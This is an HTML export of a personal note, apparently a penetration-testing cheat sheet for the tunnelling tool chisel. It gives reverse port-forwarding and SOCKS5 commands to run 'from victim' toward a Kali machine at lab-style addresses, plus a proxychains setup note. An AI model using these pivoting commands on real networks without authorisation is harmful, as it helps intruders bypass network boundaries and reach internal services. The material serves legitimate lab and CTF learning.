<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>chisel</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>chisel</h1>

      <div class="ck-content">
        <p><code>#on your system, start the chisel server</code>

        </p><pre><code class="language-text-plain">chisel server --reverse -p 3000</code></pre>

        <p><code># connect to the chisel server</code>

          <br /><code>chisel client &lt;your-IP&gt;:&lt;port&gt; R:3275:localhost:3275</code>

        </p><pre><code class="language-text-plain">./chisel client 10.17.17.11:3000 R:8000:localhost:8000
./chisel client 10.10.14.82:3000 R:5000:localhost:3000</code></pre>

        <p> </p>
        <p>Start server listening on 8000:</p>
        <p><code>./chisel server -p 8000 --reverse</code>

        </p>
        <p>From victim:</p>
        <figure class="table">
          <table>
            <thead>
              <tr>
                <th>Command</th>
                <th>Notes</th>
              </tr>
            </thead>
            <tbody>
              <tr>
                <td><code>chisel client 10.10.14.3:8000 R:80:127.0.0.1:80</code>

                </td>
                <td>Listen on Kali 80, forward to localhost port 80 on client</td>
              </tr>
              <tr>
                <td><code>chisel client 10.10.14.3:8000 R:4444:10.10.10.240:80</code>

                </td>
                <td>Listen on Kali 4444, forward to 10.10.10.240 port 80</td>
              </tr>
              <tr>
                <td><code>chisel client 10.10.14.3:8000 R:socks</code>

                </td>
                <td>Create SOCKS5 listener on 1080 on Kali, proxy through client</td>
              </tr>
            </tbody>
          </table>
        </figure>
        <p>Now that we have a SOCKs server set up, we need to interpret and manage
          these connections. This is where proxychains come in. Proxychains allows
          us to connect to the SOCKs server and route traffic through the proxy in
          the command line. To add the SOCKs server to proxychains, you will need
          to edit <code>/etc/proxychains.conf</code>. You can see an example configuration
          below.</p>
        <figure class="image">
          <img src="chisel/PLDdyI8.png" />
        </figure>
      </div>
    </div>
  </body>

</html>